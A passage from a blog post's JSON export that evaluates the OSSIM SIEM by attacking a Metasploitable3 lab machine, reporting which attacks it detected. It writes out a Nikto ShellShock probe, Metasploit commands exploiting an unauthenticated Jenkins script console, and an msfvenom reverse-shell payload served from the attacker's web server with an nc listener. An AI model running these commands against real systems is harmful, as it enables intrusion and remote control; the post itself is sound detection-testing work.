host, as the event was reported by the local HIDS running on the victim rather than by the network sensor.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4378 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM13.jpg?resize=801%2C462&#038;ssl=1\" alt=\"\" width=\"801\" height=\"462\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM13.jpg?w=801&amp;ssl=1 801w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM13.jpg?resize=300%2C173&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM13.jpg?resize=768%2C443&amp;ssl=1 768w\" sizes=\"auto, (max-width: 801px) 100vw, 801px\" \/><\/p>\n<h3><a 
name=\"_Toc80823575\"><\/a>ShellShock<\/h3>\n<p>We used the command below to emulate a ShellShock (CVE-2014-6271) attack against Metasploitable3 on port 8585, which runs WordPress. Nikto includes a ShellShock test among its checks, so the scan generates requests carrying the CVE-2014-6271 pattern that the custom directive looks for.<\/p>\n<p>Command: <em>nikto -h <\/em><a href=\"http:\/\/10.0.2.2:8585\/wordpress\/\"><em>http:\/\/10.0.2.2:8585\/wordpress\/<\/em><\/a><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4379 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/nikto.jpg?resize=807%2C243&#038;ssl=1\" alt=\"\" width=\"807\" height=\"243\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/nikto.jpg?w=807&amp;ssl=1 807w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/nikto.jpg?resize=300%2C90&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/nikto.jpg?resize=768%2C231&amp;ssl=1 768w\" sizes=\"auto, (max-width: 807px) 100vw, 807px\" \/><\/p>\n<p>OSSIM detected and flagged this possible attack using the customised directive I had created. Note that the alarm reflects the probe pattern being seen on the wire, not a successful exploitation: CVE-2014-6271 is a GNU Bash bug, so a Windows WordPress host is not itself vulnerable to it.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4380 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM14.jpg?resize=798%2C468&#038;ssl=1\" alt=\"\" width=\"798\" height=\"468\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM14.jpg?w=798&amp;ssl=1 798w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM14.jpg?resize=300%2C176&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/OSSIM14.jpg?resize=768%2C450&amp;ssl=1 768w\" sizes=\"auto, (max-width: 798px) 100vw, 798px\" \/><\/p>\n<h3><a name=\"_Toc80823576\"><\/a>Application Exploitation (Jenkins)<\/h3>\n<p>We used the strategy below to attack the Jenkins application running on port 
8484<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4381 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Jenkins.jpg?resize=807%2C306&#038;ssl=1\" alt=\"\" width=\"807\" height=\"306\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Jenkins.jpg?w=807&amp;ssl=1 807w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Jenkins.jpg?resize=300%2C114&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/Jenkins.jpg?resize=768%2C291&amp;ssl=1 768w\" sizes=\"auto, (max-width: 807px) 100vw, 807px\" \/><\/p>\n<p>This service uses port 8484, and the version of the Jenkins web app is 1.637.<\/p>\n<p>I enumerated details about this server using the auxiliary modules available in Metasploit.<\/p>\n<p><em>search type:auxiliary jenkins<\/em><\/p>\n<p><em>use auxiliary\/scanner\/http\/jenkins_command<\/em><\/p>\n<p>The jenkins_command module searches for unauthenticated script consoles that allow commands to be executed on them. 
In this case the scanner executes the command whoami.<\/p>\n<p>We set the parameters as follows:<\/p>\n<p><em>set RHOSTS 10.0.2.2<\/em><\/p>\n<p><em>set RPORT 8484<\/em><\/p>\n<p><em>set TARGETURI \/<\/em><\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4382 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins1.jpg?resize=804%2C387&#038;ssl=1\" alt=\"\" width=\"804\" height=\"387\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins1.jpg?w=804&amp;ssl=1 804w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins1.jpg?resize=300%2C144&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins1.jpg?resize=768%2C370&amp;ssl=1 768w\" sizes=\"auto, (max-width: 804px) 100vw, 804px\" \/><\/p>\n<p>Then I searched for Jenkins-based exploits.<\/p>\n<p><em>search type:exploit jenkins<\/em><\/p>\n<p><em>use exploit\/multi\/http\/jenkins_script_console<\/em><\/p>\n<p><em>set RHOSTS 10.0.2.2<\/em><\/p>\n<p><em>set RPORT 8484<\/em><\/p>\n<p><em>set TARGETURI \/<\/em><\/p>\n<p><em>exploit<\/em><\/p>\n<p>We successfully got a Meterpreter shell:<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4383 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins3.jpg?resize=795%2C213&#038;ssl=1\" alt=\"\" width=\"795\" height=\"213\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins3.jpg?w=795&amp;ssl=1 795w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins3.jpg?resize=300%2C80&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/jenkins3.jpg?resize=768%2C206&amp;ssl=1 768w\" sizes=\"auto, (max-width: 795px) 100vw, 795px\" \/><\/p>\n<p>This attack went undetected by OSSIM, as no alerts were raised by either HIDS or 
NIDS.<\/p>\n<h3><a name=\"_Toc80823577\"><\/a>Reverse Shell<\/h3>\n<p>We created a malicious payload, hosted it on a web server on the attacker machine and executed it on the victim machine:<\/p>\n<p><strong>Create Malicious Payload<\/strong><\/p>\n<p>\/usr\/bin\/msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.0.2.15 LPORT=9999 -f exe -o payload.exe<\/p>\n<p><strong>Start WebServer<\/strong><\/p>\n<p>python -m SimpleHTTPServer 4000<\/p>\n<p>(SimpleHTTPServer is the Python 2 module; on a Python 3 only system the equivalent is <em>python3 -m http.server 4000<\/em>.)<\/p>\n<p>Trick the user on the victim machine into downloading and executing the malicious payload.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4384 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/reverseshell.jpg?resize=834%2C702&#038;ssl=1\" alt=\"\" width=\"834\" height=\"702\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/reverseshell.jpg?w=834&amp;ssl=1 834w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/reverseshell.jpg?resize=300%2C253&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/reverseshell.jpg?resize=768%2C646&amp;ssl=1 768w\" sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/p>\n<p>We successfully got a reverse shell connection on the Kali machine, listening with:<\/p>\n<p>Command: nc -lnvp 9999<\/p>\n<p>Note that windows\/meterpreter\/reverse_tcp is a staged payload: a plain netcat listener shows the inbound connection, but an interactive Meterpreter session needs the Metasploit handler (<em>exploit\/multi\/handler<\/em> with the same payload, LHOST and LPORT) to deliver the second stage.<\/p>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4385 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/rs1.jpg?resize=795%2C51&#038;ssl=1\" alt=\"\" width=\"795\" height=\"51\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/rs1.jpg?w=795&amp;ssl=1 795w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/rs1.jpg?resize=300%2C19&amp;ssl=1 300w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/rs1.jpg?resize=768%2C49&amp;ssl=1 768w\" sizes=\"auto, 
(max-width: 795px) 100vw, 795px\" \/><\/p>\n<p>But there were no alerts on the OSSIM console for this; it was undetected by OSSIM.<\/p>\n<h2><a name=\"_Toc80823578\"><\/a>Dashboard after attacks<\/h2>\n<p>On the Analysis and Alarms page, we can see our directives worked as expected and we captured the below alarms: &#8211;<\/p>\n<ol>\n<li>NMAP<\/li>\n<li>Brute-Force<\/li>\n<li>ShellShock Attack<\/li>\n<\/ol>\n<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-4386 size-full\" src=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/dash.jpg?resize=828%2C858&#038;ssl=1\" alt=\"\" width=\"828\" height=\"858\" srcset=\"https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/dash.jpg?w=828&amp;ssl=1 828w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/dash.jpg?resize=290%2C300&amp;ssl=1 290w, https:\/\/i0.wp.com\/mayanknauni.com\/wp-content\/uploads\/2021\/10\/dash.jpg?resize=768%2C796&amp;ssl=1 768w\" sizes=\"auto, (max-width: 828px) 100vw, 828px\" \/><\/p>\n<h2><a name=\"_Toc80823579\"><\/a>Reports<\/h2>\n<p>The OSSIM console provides very comprehensive reports on the below subjects: &#8211;<\/p>\n<ol>\n<li><strong>Alarm Report <\/strong><\/li>\n<\/ol>\n<ul>\n<li>Top 10 attacker host<\/li>\n<li>Top 10 Attacked Host<\/li>\n<li>Top 10 used ports<\/li>\n<li>Top 15 Alarms<\/li>\n<li>Top 15 Alarms by Risk<\/li>\n<\/ul>\n<p>There are more reports available on the topics below: &#8211;<\/p>\n<ol start=\"2\">\n<li><strong>Business and Compliance ISO PCI Report <\/strong><\/li>\n<li><strong>SIEM Events <\/strong><\/li>\n<li><strong>Vulnerability Report <\/strong><\/li>\n<\/ol>\n<h1><a name=\"_Toc80823580\"><\/a>Results<\/h1>\n<p>We were able to successfully detect three out of five attacks conducted on the Metasploitable3 machine, which proves that OSSIM\u2019s correlation and anomaly detection models work as 
expected:<\/p>\n<ul>\n<li>Brute force \u2013 Detected Successfully<\/li>\n<li>Probe \u2013 Detected Successfully<\/li>\n<li>ShellShock (using Nikto) \u2013 Detected Successfully<\/li>\n<li>Exploiting Jenkins \u2013 Couldn\u2019t be detected<\/li>\n<li>Remote shell \u2013 Couldn\u2019t be detected<\/li>\n<\/ul>\n<p>While not being able to detect such critical attacks is a matter of concern, I am aware of the limitations of this POC setup that explain why we were not able to capture them.<\/p>\n<p>For a SIEM to correlate alerts, there have to be alerts in the first place; for the failed scenarios we couldn\u2019t see any alerts on the SIEM from the sensor sources, which explains why they weren\u2019t caught.<\/p>\n<p>In an ideal environment we will have logs from more sources such as:-<\/p>\n<ul>\n<li>Firewall<\/li>\n<li>IPS \/ IDS<\/li>\n<li>Network Devices (NetFlow)<\/li>\n<li>WAF<\/li>\n<\/ul>\n<p>In that situation it will be easier to catch such attacks on the SIEM. The more (relevant) alerts, the better the correlation.<\/p>\n<h1><a name=\"_Toc80823581\"><\/a>Discussion<\/h1>\n<p>I had started with QRadar but switched to OSSIM due to the below issues:<\/p>\n<ul>\n<li>License issue on the latest version, which is primarily an unfixed bug and is supported on a best-effort basis<\/li>\n<li>When I managed to resolve the license issue, I couldn\u2019t collect any network flow logs despite being able to see flows by performing tcpdump on QRadar<\/li>\n<\/ul>\n<p>While I was enticed to incorporate DDoS as one of the use cases, I noticed that a DDoS such as a TCP SYN attack would render the OSSIM VM unusable due to some bug or probably a shortcoming in the infra of the POC.<\/p>\n<p>The biggest challenge I faced during this POC setup and testing was primarily the instability of VMs, caused by memory issues. OSSIM had crashed multiple times with a database error. 
The snapshot is below:<\/p>\n<p>The snapshot couldn\u2019t provide recovery either; I ended up creating the image from scratch multiple times. If hardware constraints weren\u2019t there, the POC could have shown better and more consistent results.<\/p>\n<p>The OSSIM tool has some fantastic features such as live traffic capture via the traffic capture module and a built-in traffic capture reader.<\/p>\n<h1><a name=\"_Toc80823583\"><\/a>References<\/h1>\n<p><a href=\"https:\/\/cybersecurity.att.com\/products\/ossim\">https:\/\/cybersecurity.att.com\/products\/ossim<\/a><\/p>\n<p><a href=\"https:\/\/cybersecurity.att.com\/documentation\/usm-appliance\/correlation\/tutorial-creating-new-directive.htm\">https:\/\/cybersecurity.att.com\/documentation\/usm-appliance\/correlation\/tutorial-creating-new-directive.htm<\/a><\/p>\n<p><a href=\"https:\/\/www.ossec.net\/\">https:\/\/www.ossec.net\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Disclaimer:- This note was written by me ( Mayank Nauni)\u00a0in my personal capacity. 
The opinions expressed in this article are solely my own and do not reflect the view of my employer or my preference towards any of the OEMs.&#46;&#46;&#46;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[53],"tags":[62,61,60,63,65,64],"class_list":["post-4359","post","type-post","status-publish","format-standard","hentry","category-cyber-security","tag-attack","tag-intrusion-detection","tag-network-anomaly-detection","tag-nids","tag-siem","tag-soc"],"aioseo_notices":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4359","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4359"}],"version-history":[{"count":7,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4359\/revisions"}],"predecessor-version":[{"id":4391,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=\/wp\/v2\/posts\/4359\/revisions\/4391"}],"wp:attachment":[{"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4359"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mayanknauni.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4359"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mayanknauni.com\/inde
x.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4359"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}